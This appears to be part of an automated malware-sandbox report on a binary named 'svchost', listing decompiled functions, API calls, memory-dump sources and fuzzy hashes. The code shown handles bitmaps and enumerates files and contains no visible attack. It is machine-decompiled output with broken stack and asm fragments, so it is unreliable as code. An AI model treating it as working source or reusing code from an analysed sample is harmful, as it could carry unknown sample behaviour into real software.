                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406510, Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00406510(void* __eax, void* __edx) {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				intOrPtr* _t10;

				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
				return _t3;
			}








                                                                          0x00406517
                                                                          0x0040651d

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: IconInfo
                                                                          • String ID:
                                                                          • API String ID: 2096194817-0
                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0040F0C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040F0CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040627C, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 46%
                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* _t59;
				struct HBITMAP__* _t62;
				void* _t68;
				void* _t71;
				int _t72;
				int _t75;
				int _t80;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t100;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t119;
				signed int _t121;
				struct HBITMAP__* _t124;
				struct HBITMAP__* _t125;
				RECT* _t126;
				void* _t128;

				_t128 = __eflags;
				_push(__eax);
				E00406144(__eax);
				_pop(_t59);
				if(_t128 != 0) {
					asm("pushad");
					_t100 = _t59;
					 *((intOrPtr*)(_t100 + 0x34))();
					 *((intOrPtr*)(_t100 + 0x28)) = 0;
					 *((intOrPtr*)(_t100 + 0x56)) = 0;
					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
					asm("jecxz 0x13");
					_t62 =  *(_t100 + 0x3d);
					_t121 =  *(_t62 + 4);
					_t119 =  *(_t62 + 8);
					if(_t119 < 0) {
						_t119 =  ~_t119;
					}
					_push(0);
					L00404108();
					_push(_t62);
					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
					if( *((char*)(_t100 + 0x3c)) != 1) {
						asm("jecxz 0xfffffff2");
						_t124 = 0;
						_t110 =  *(_t100 + 0x18);
						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
						__eflags =  *(_t100 + 0x49) - 5;
						if( *(_t100 + 0x49) == 5) {
							E0040600C(_t67, _t110);
						}
						_pop(_t68);
						_push(_t68);
						_push(E00406268(_t68) *  *(_t100 + 0x18));
						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
						_push(_t71);
						_push(0);
						_push(_v12);
						_push(_t71);
						_t72 =  *(_t100 + 0x18);
						__eflags = _t72 - _t119;
						if(__eflags > 0) {
							_t72 = _t119;
						}
						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
						_t113 =  *(_t100 + 0x18);
						__eflags = _t113 - _t119;
						if(_t113 > _t119) {
							_t113 = _t119;
						}
						__eflags = _t75 - _t113;
						if(__eflags != 0) {
							_pop(_t81);
							E00402468(_t81);
							_push(0);
							_push(0);
							_push(0);
							_push(_t126);
							_push(0);
							_push(_v40);
							_push(_v36);
							L00404110();
							_t121 = _t121 ^ 0xffffffff;
							_t124 = 0;
							_t85 = SelectObject(_v60, 0);
							_t113 = _v68;
							__eflags = 0;
							E00406094(_t100, 0, _v68, 0, 0);
							SelectObject(_v72, _t85);
						}
						E00406024(_t100, _t100, _t113, __eflags);
						_pop( *_t47);
						_pop( *_t48);
						_pop( *_t49);
						 *(_t100 + 0x20) = _t124;
						__eflags = _t121;
						 *(_t100 + 0x72) = 0;
						if(_t121 < 0) {
							_t52 = _t100 + 0x72;
							 *_t52 =  *(_t100 + 0x72) + 1;
							__eflags =  *_t52;
						}
					} else {
						_push(0);
						L00404178();
						_push(_t62);
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(_t62);
						L00404100();
						_t125 = _t62;
						L00404190();
						_t116 = 0;
						_push(_t116);
						_push(SelectObject(_t116, _t125));
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(0);
						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
						_t117 = _t126;
						FillRect(_v44, _t126, _t94);
						DeleteObject(_t94);
						asm("jecxz 0x24");
						SelectObject(_v60, 0);
						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
						E00406024(_t100, _t100, _t117, _t130);
						 *(_t100 + 0x20) = _t125;
					}
					asm("jecxz 0xa");
					_pop(_t114);
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
					_t80 = DeleteDC(_t119);
					asm("popad");
					return _t80;
				}
				return _t59;
			}






























                                                                          0x0040627c
                                                                          0x0040627c
                                                                          0x0040627d
                                                                          0x00406282
                                                                          0x00406283
                                                                          0x00406289
                                                                          0x0040628a
                                                                          0x0040628c
                                                                          0x00406291
                                                                          0x00406294
                                                                          0x00406297
                                                                          0x004062a3
                                                                          0x004062a5
                                                                          0x004062a8
                                                                          0x004062ab
                                                                          0x004062b0
                                                                          0x004062b2
                                                                          0x004062b2
                                                                          0x004062d5
                                                                          0x004062d7
                                                                          0x004062dc
                                                                          0x004062dd
                                                                          0x004062e1
                                                                          0x00406397
                                                                          0x00406399
                                                                          0x0040639e
                                                                          0x004063a6
                                                                          0x004063a7
                                                                          0x004063ab
                                                                          0x004063ad
                                                                          0x004063ad
                                                                          0x004063b2
                                                                          0x004063b3
                                                                          0x004063be
                                                                          0x004063bf
                                                                          0x004063c4
                                                                          0x004063c5
                                                                          0x004063c7
                                                                          0x004063cb
                                                                          0x004063cc
                                                                          0x004063cf
                                                                          0x004063d1
                                                                          0x004063d3
                                                                          0x004063d3
                                                                          0x004063e4
                                                                          0x004063e9
                                                                          0x004063ec
                                                                          0x004063ee
                                                                          0x004063f0
                                                                          0x004063f0
                                                                          0x004063f2
                                                                          0x004063f4
                                                                          0x004063f6
                                                                          0x004063f7
                                                                          0x004063fe
                                                                          0x00406405
                                                                          0x00406406
                                                                          0x00406407
                                                                          0x00406408
                                                                          0x0040640a
                                                                          0x0040640b
                                                                          0x0040640f
                                                                          0x00406414
                                                                          0x00406417
                                                                          0x0040641d
                                                                          0x00406423
                                                                          0x00406427
                                                                          0x0040642c
                                                                          0x00406435
                                                                          0x00406435
                                                                          0x0040643c
                                                                          0x00406441
                                                                          0x00406444
                                                                          0x00406447
                                                                          0x0040644a
                                                                          0x0040644d
                                                                          0x0040644f
                                                                          0x00406453
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x004062e7
                                                                          0x004062e7
                                                                          0x004062e9
                                                                          0x004062ee
                                                                          0x004062ef
                                                                          0x004062f2
                                                                          0x004062f5
                                                                          0x004062f6
                                                                          0x004062fb
                                                                          0x004062fe
                                                                          0x00406303
                                                                          0x00406304
                                                                          0x0040630c
                                                                          0x0040630d
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406320
                                                                          0x00406325
                                                                          0x0040632e
                                                                          0x00406333
                                                                          0x0040633e
                                                                          0x00406344
                                                                          0x0040635b
                                                                          0x00406378
                                                                          0x0040637d
                                                                          0x0040637d
                                                                          0x0040645b
                                                                          0x0040645d
                                                                          0x00406463
                                                                          0x00406465
                                                                          0x0040646a
                                                                          0x00000000
                                                                          0x0040646a
                                                                          0x0040646b

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                          • 72E7A590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                          • 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                          • 72E7A520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                          • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                          • FillRect.USER32 ref: 0040632E
                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                          • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                          • String ID:
                                                                          • API String ID: 2504469172-0
                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040FD14, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                          • 72E7A590.GDI32(00000000), ref: 0040FD6F
                                                                          • 72E7AC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                          • 72E7A520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                          • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                          • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                          • String ID:
                                                                          • API String ID: 2504469172-0
                                                                          • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                          • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                                          • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                          • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406218, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 57%
                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* __ebx;
				void* _t64;
				void* _t66;
				struct HBITMAP__* _t69;
				void* _t75;
				void* _t78;
				int _t79;
				int _t82;
				int _t87;
				void* _t88;
				void* _t92;
				void* _t101;
				void* _t108;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t133;
				struct HDC__* _t135;
				struct HDC__* _t137;
				void* _t139;
				int* _t140;
				struct HDC__* _t142;
				signed int _t144;
				struct HBITMAP__* _t147;
				struct HBITMAP__* _t148;
				RECT* _t149;
				void* _t151;

				_t151 = __eflags;
				_t113 = __eax;
				_t64 = E00406144(__eax);
				if(_t151 == 0) {
					L7:
					if(__eflags != 0) {
						E00406144(_t64);
						_t66 = _t64;
						if(__eflags != 0) {
							asm("pushad");
							_t115 = _t66;
							 *((intOrPtr*)(_t115 + 0x34))();
							 *((intOrPtr*)(_t115 + 0x28)) = 0;
							 *((intOrPtr*)(_t115 + 0x56)) = 0;
							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
							asm("jecxz 0x13");
							_t69 =  *(_t115 + 0x3d);
							_t144 =  *(_t69 + 4);
							_t142 =  *(_t69 + 8);
							__eflags = _t142;
							if(_t142 < 0) {
								_t142 =  ~_t142;
							}
							_push(0);
							L00404108();
							_push(_t69);
							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
							if( *((char*)(_t115 + 0x3c)) != 1) {
								asm("jecxz 0xfffffff2");
								_t147 = 0;
								_t129 =  *(_t115 + 0x18);
								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
								__eflags =  *(_t115 + 0x49) - 5;
								if( *(_t115 + 0x49) == 5) {
									E0040600C(_t74, _t129);
								}
								_pop(_t75);
								_push(_t75);
								_push(E00406268(_t75) *  *(_t115 + 0x18));
								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
								_push(_t78);
								_push(0);
								_push(_v12);
								_push(_t78);
								_t79 =  *(_t115 + 0x18);
								__eflags = _t79 - _t142;
								if(__eflags > 0) {
									_t79 = _t142;
								}
								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
								_t132 =  *(_t115 + 0x18);
								__eflags = _t132 - _t142;
								if(_t132 > _t142) {
									_t132 = _t142;
								}
								__eflags = _t82 - _t132;
								if(__eflags != 0) {
									_pop(_t88);
									E00402468(_t88);
									_push(0);
									_push(0);
									_push(0);
									_push(_t149);
									_push(0);
									_push(_v40);
									_push(_v36);
									L00404110();
									_t144 = _t144 ^ 0xffffffff;
									_t147 = 0;
									_t92 = SelectObject(_v60, 0);
									_t132 = _v68;
									__eflags = 0;
									E00406094(_t115, 0, _v68, 0, 0);
									SelectObject(_v72, _t92);
								}
								E00406024(_t115, _t115, _t132, __eflags);
								_pop( *_t51);
								_pop( *_t52);
								_pop( *_t53);
								 *(_t115 + 0x20) = _t147;
								__eflags = _t144;
								 *(_t115 + 0x72) = 0;
								if(_t144 < 0) {
									_t56 = _t115 + 0x72;
									 *_t56 =  &( *(_t115 + 0x72)->i);
									__eflags =  *_t56;
								}
								goto L25;
							} else {
								_push(0);
								L00404178();
								_push(_t69);
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(_t69);
								L00404100();
								_t148 = _t69;
								L00404190();
								_t135 = 0;
								_push(_t135);
								_push(SelectObject(_t135, _t148));
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(0);
								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
								_t136 = _t149;
								FillRect(_v44, _t149, _t101);
								DeleteObject(_t101);
								asm("jecxz 0x24");
								SelectObject(_v60, 0);
								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
								E00406024(_t115, _t115, _t136, __eflags);
								 *(_t115 + 0x20) = _t148;
								L25:
								asm("jecxz 0xa");
								_pop(_t133);
								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
								_t87 = DeleteDC(_t142);
								asm("popad");
								return _t87;
							}
						}
						return _t66;
					} else {
						return _t64;
					}
				} else {
					_push(__edx);
					_t64 = E0040648C(_t113, __edx);
					_pop(_t137);
					if(_t64 == _t137) {
						goto L7;
					} else {
						_t108 = _t113;
						if(_t137 != 0) {
							 *(_t113 + 0x49) = _t137;
							__eflags = _t137 - 5;
							if(_t137 == 5) {
								_t137 = _t137 - 1;
								__eflags = _t137;
							}
							L27();
							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
							_t139 = _t137;
							__eflags = _t111 - _t139;
							_t64 = _t113;
							goto L7;
						} else {
							_t140 =  &(_t137->i);
							if(_t140 !=  *(_t108 + 0x3c)) {
								 *(_t108 + 0x3c) = _t140;
								L9();
								return _t108;
							}
							return _t108;
						}
					}
				}
			}






































                                                                          0x00406218
                                                                          0x00406219
                                                                          0x0040621b
                                                                          0x00406220
                                                                          0x0040625d
                                                                          0x0040625e
                                                                          0x0040627d
                                                                          0x00406282
                                                                          0x00406283
                                                                          0x00406289
                                                                          0x0040628a
                                                                          0x0040628c
                                                                          0x00406291
                                                                          0x00406294
                                                                          0x00406297
                                                                          0x004062a3
                                                                          0x004062a5
                                                                          0x004062a8
                                                                          0x004062ab
                                                                          0x004062ae
                                                                          0x004062b0
                                                                          0x004062b2
                                                                          0x004062b2
                                                                          0x004062d5
                                                                          0x004062d7
                                                                          0x004062dc
                                                                          0x004062dd
                                                                          0x004062e1
                                                                          0x00406397
                                                                          0x00406399
                                                                          0x0040639e
                                                                          0x004063a6
                                                                          0x004063a7
                                                                          0x004063ab
                                                                          0x004063ad
                                                                          0x004063ad
                                                                          0x004063b2
                                                                          0x004063b3
                                                                          0x004063be
                                                                          0x004063bf
                                                                          0x004063c4
                                                                          0x004063c5
                                                                          0x004063c7
                                                                          0x004063cb
                                                                          0x004063cc
                                                                          0x004063cf
                                                                          0x004063d1
                                                                          0x004063d3
                                                                          0x004063d3
                                                                          0x004063e4
                                                                          0x004063e9
                                                                          0x004063ec
                                                                          0x004063ee
                                                                          0x004063f0
                                                                          0x004063f0
                                                                          0x004063f2
                                                                          0x004063f4
                                                                          0x004063f6
                                                                          0x004063f7
                                                                          0x004063fe
                                                                          0x00406405
                                                                          0x00406406
                                                                          0x00406407
                                                                          0x00406408
                                                                          0x0040640a
                                                                          0x0040640b
                                                                          0x0040640f
                                                                          0x00406414
                                                                          0x00406417
                                                                          0x0040641d
                                                                          0x00406423
                                                                          0x00406427
                                                                          0x0040642c
                                                                          0x00406435
                                                                          0x00406435
                                                                          0x0040643c
                                                                          0x00406441
                                                                          0x00406444
                                                                          0x00406447
                                                                          0x0040644a
                                                                          0x0040644d
                                                                          0x0040644f
                                                                          0x00406453
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00000000
                                                                          0x004062e7
                                                                          0x004062e7
                                                                          0x004062e9
                                                                          0x004062ee
                                                                          0x004062ef
                                                                          0x004062f2
                                                                          0x004062f5
                                                                          0x004062f6
                                                                          0x004062fb
                                                                          0x004062fe
                                                                          0x00406303
                                                                          0x00406304
                                                                          0x0040630c
                                                                          0x0040630d
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406320
                                                                          0x00406325
                                                                          0x0040632e
                                                                          0x00406333
                                                                          0x0040633e
                                                                          0x00406344
                                                                          0x0040635b
                                                                          0x00406378
                                                                          0x0040637d
                                                                          0x00406458
                                                                          0x0040645b
                                                                          0x0040645d
                                                                          0x00406463
                                                                          0x00406465
                                                                          0x0040646a
                                                                          0x00000000
                                                                          0x0040646a
                                                                          0x004062e1
                                                                          0x0040646b
                                                                          0x00406264
                                                                          0x00406264
                                                                          0x00406264
                                                                          0x00406222
                                                                          0x00406224
                                                                          0x00406225
                                                                          0x0040622a
                                                                          0x0040622d
                                                                          0x00000000
                                                                          0x0040622f
                                                                          0x00406231
                                                                          0x00406233
                                                                          0x0040623c
                                                                          0x0040623f
                                                                          0x00406242
                                                                          0x00406244
                                                                          0x00406244
                                                                          0x00406244
                                                                          0x00406248
                                                                          0x00406254
                                                                          0x00406259
                                                                          0x0040625a
                                                                          0x0040625c
                                                                          0x00000000
                                                                          0x00406235
                                                                          0x00406236
                                                                          0x0040647f
                                                                          0x00406481
                                                                          0x00406484
                                                                          0x00000000
                                                                          0x00406484
                                                                          0x00406489
                                                                          0x00406489
                                                                          0x00406233
                                                                          0x0040622d

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040FCB0, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004100D0, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
